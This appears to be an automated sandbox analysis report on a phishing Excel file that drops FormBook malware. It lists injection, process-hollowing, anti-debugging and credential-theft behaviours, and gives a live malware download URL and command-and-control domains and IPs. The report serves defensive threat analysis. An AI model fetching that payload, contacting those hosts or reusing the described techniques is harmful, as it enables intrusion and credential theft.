          Source: explorer.exe, 00000006.00000000.2206127448.0000000004263000.00000004.00000001.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
          Source: explorer.exe, 00000006.00000000.2205994745.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 00000006.00000000.2194693430.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
          Source: C:\Users\Public\vbc.exeProcess queried: DebugFlags
          Source: C:\Users\Public\vbc.exeProcess queried: DebugObjectHandle
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess queried: DebugFlags
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess queried: DebugObjectHandle
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409A80 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00580017 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00830080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008300EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeCode function: 5_2_008526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008B0080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008B00EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeCode function: 8_2_008D26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 9_2_025526F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess token adjusted: Debug
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 91.195.241.137 80
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeMemory written: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 260000
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: F80000
          Source: C:\Windows\SysWOW64\chkdsk.exeSection unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: A40000
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe
          Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files (x86)\Mozilla Firefox\firefox.exe C:\Program Files (x86)\Mozilla Firefox\Firefox.exe
          Source: explorer.exe, 00000006.00000000.2195363128.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2195363128.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2194662661.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2195363128.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vbc.exe VolumeInformation
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\chkdsk.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
          Tries to steal Mail credentials (via file access)Show sources
          Source: C:\Windows\SysWOW64\chkdsk.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.2193415399.00000000036B6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2382057635.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237322220.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2193296020.0000000003569000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2220261432.0000000003533000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237505269.0000000000540000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2218859578.0000000003399000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2220136136.00000000034E6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225048844.0000000000250000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2382110652.0000000000230000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.2381962745.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2237415412.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225094311.0000000000360000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2193435014.0000000003703000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.2225125091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2238667195.0000000000100000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2257843433.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Startup Items1Startup Items1Disable or Modify Tools11OS Credential Dumping1System Network Connections Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Credential API Hooking1File and Directory Discovery3Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsExploitation for Client Execution13Registry Run Keys / Startup Folder12Process Injection612Obfuscated Files or Information41Security Account ManagerSystem Information Discovery113SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder12Software Packing13NTDSSecurity Software Discovery131Distributed Component Object ModelEmail Collection1Scheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion3SSHCredential API Hooking1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsRootkit1DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading111Proc FilesystemSystem Network Configuration Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion3/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection612Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 323718 Sample: PO11272020.xlsx Startdate: 27/11/2020 Architecture: WINDOWS Score: 100 66 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->66 68 Malicious sample detected (through community Yara rule) 2->68 70 Antivirus detection for URL or domain 2->70 72 17 other signatures 2->72 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 37 19 2->15         started        process3 dnsIp4 64 amachichywsdyjakelogontothecomputewsrty.ydns.eu 162.251.123.239, 49165, 80 UNREAL-SERVERSUS Canada 10->64 48 C:\Users\user\AppData\Local\...\vbc[1].exe, PE32 10->48 dropped 50 C:\Users\Public\vbc.exe, PE32 10->50 dropped 96 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->96 17 vbc.exe 1 10->17         started        52 C:\Users\user\Desktop\~$PO11272020.xlsx, data 15->52 dropped file5 signatures6 process7 file8 44 C:\Users\user\AppData\Roaming\...\vbc.exe, PE32 17->44 dropped 74 Drops PE files to the startup folder 17->74 76 Tries to detect virtualization through RDTSC time measurements 17->76 78 Injects a PE file into a foreign processes 17->78 21 vbc.exe 17->21         started        signatures9 process10 signatures11 80 Modifies the context of a thread in another process (thread injection) 21->80 82 Maps a DLL or memory area into another process 21->82 84 Sample uses process hollowing technique 21->84 86 Queues an APC in another process (thread injection) 21->86 24 explorer.exe 21->24 injected process12 dnsIp13 58 www.gedefo.com 91.195.241.137, 49166, 49167, 80 SEDO-ASDE Germany 24->58 60 letstalkop.com 184.168.131.241, 49168, 49169, 80 AS-26496-GO-DADDY-COM-LLCUS United States 24->60 62 2 other IPs or domains 24->62 88 System process connects to network (likely due to code injection or exploit) 24->88 28 chkdsk.exe 14 24->28         started        32 vbc.exe 24->32         started        34 NETSTAT.EXE 24->34         started        36 autochk.exe 24->36         started        signatures14 process15 file16 54 C:\Users\user\AppData\...\98-logrv.ini, data 28->54 dropped 56 C:\Users\user\AppData\...\98-logri.ini, data 28->56 dropped 98 Detected FormBook malware 28->98 100 Tries to steal Mail credentials (via file access) 28->100 102 Tries to harvest and steal browser information (history, passwords, etc) 28->102 108 3 other signatures 28->108 38 firefox.exe 1 28->38         started        104 Injects a PE file into a foreign processes 32->104 41 vbc.exe 32->41         started        106 Tries to detect virtualization through RDTSC time measurements 34->106 signatures17 process18 file19 46 C:\Users\user\AppData\...\98-logrf.ini, data 38->46 dropped 90 Modifies the context of a thread in another process (thread injection) 41->90 92 Maps a DLL or memory area into another process 41->92 94 Sample uses process hollowing technique 41->94 signatures20

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          PO11272020.xlsx36%VirustotalBrowse
          PO11272020.xlsx25%ReversingLabsDocument-Word.Trojan.Phishing

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.mercadolivre.com.br/0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.merlin.com.pl/favicon.ico0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.dailymail.co.uk/0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://image.excite.co.jp/jp/favicon/lep.ico0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://busca.igbusca.com.br//app/static/images/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://www.etmall.com.tw/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://it.search.dada.net/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://search.hanafos.com/favicon.ico0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/favicon.ico0%Avira URL Cloudsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://www.abril.com.br/favicon.ico0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://search.msn.co.jp/results.aspx?q=0%URL Reputationsafe
          http://buscar.ozu.es/0%Avira URL Cloudsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://busca.igbusca.com.br/0%URL Reputationsafe
          http://www.letstalkop.com/zsh/0%Avira URL Cloudsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://search.auction.co.kr/0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://busca.buscape.com.br/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://www.pchome.com.tw/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://browse.guardian.co.uk/favicon.ico0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://google.pchome.com.tw/0%URL Reputationsafe
          http://www.ozu.es/favicon.ico0%Avira URL Cloudsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://search.yahoo.co.jp/favicon.ico0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://www.gmarket.co.kr/0%URL Reputationsafe
          http://amachichywsdyjakelogontothecomputewsrty.ydns.eu/amchdoc/vbc.exe100%Avira URL Cloudmalware
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://searchresults.news.com.au/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://www.asharqalawsat.com/0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://search.yahoo.co.jp0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://buscador.terra.es/0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://search.orange.co.uk/favicon.ico0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://p.zhongsou.com/favicon.ico0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.gedefo.com
          91.195.241.137
          truetrue
            unknown
            amachichywsdyjakelogontothecomputewsrty.ydns.eu
            162.251.123.239
            truetrue
              unknown
              letstalkop.com
              184.168.131.241
              truetrue
                unknown
                www.letstalkop.com
                unknown
                unknowntrue
                  unknown
                  www.realestateworld.club
                  unknown
                  unknowntrue
                    unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://www.letstalkop.com/zsh/true
                    • Avira URL Cloud: safe
                    unknown
                    http://amachichywsdyjakelogontothecomputewsrty.ydns.eu/amchdoc/vbc.exetrue
                    • Avira URL Cloud: malware
                    unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://search.chol.com/favicon.icoexplorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                      high
                      http://www.mercadolivre.com.br/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://search.ebay.de/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                        high
                        http://www.mtv.com/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                          high
                          http://www.rambler.ru/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                            high
                            http://www.nifty.com/favicon.icoexplorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                              high
                              http://www.dailymail.co.uk/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www3.fnac.com/favicon.icoexplorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                high
                                http://buscar.ya.com/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                  high
                                  http://search.yahoo.com/favicon.icoexplorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                    high
                                    http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2206551971.0000000004B50000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.mozilla.com0chkdsk.exe, 00000009.00000003.2254364673.0000000003601000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.sogou.com/favicon.icoexplorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                      high
                                      http://asp.usatoday.com/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                        high
                                        http://fr.search.yahoo.com/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                          high
                                          http://rover.ebay.comexplorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                            high
                                            http://in.search.yahoo.com/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                              high
                                              http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                                high
                                                http://search.ebay.in/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  high
                                                  http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://%s.comexplorer.exe, 00000006.00000000.2226075654.000000000A330000.00000008.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  low
                                                  http://msk.afisha.ru/explorer.exe, 00000006.00000000.2226166860.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    high
